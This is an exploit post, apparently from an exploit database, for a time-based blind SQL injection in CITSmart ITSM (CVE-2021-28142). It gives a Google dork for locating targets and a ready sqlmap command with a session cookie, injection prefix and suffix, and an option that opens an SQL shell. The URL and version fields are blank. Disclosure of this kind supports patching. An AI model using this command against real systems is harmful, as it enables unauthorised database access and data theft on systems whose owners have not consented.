CITSmart ITSM SQL Injection

CITSmart ITSM version suffers from a remote time-based blind SQL injection vulnerability.

MD5 | 3d24d2282ef6f774e3ec4558ad1409d1

# Exploit Title: CITSmart ITSM - 'query' Time-based Blind SQL Injection (Authenticated)
# Google Dork: "citsmart.local"
# Date: 11/03/2021
# Exploit Author: skysbsb
# Vendor Homepage:
# Version: <
# CVE : CVE-2021-28142

To exploit this flaw it is necessary to be authenticated.

URL vulnerable:
Param vulnerable: query

Sqlmap usage: sqlmap -u "" --cookie 'JSESSIONID=xxx' --time-sec 1 --prefix "')" --suffix "AND ('abc%'='abc" --sql-shell

Affected versions: <
Fixed versions: >=

Vendor has acknowledge this vulnerability at ticket 11216 (

Related Posts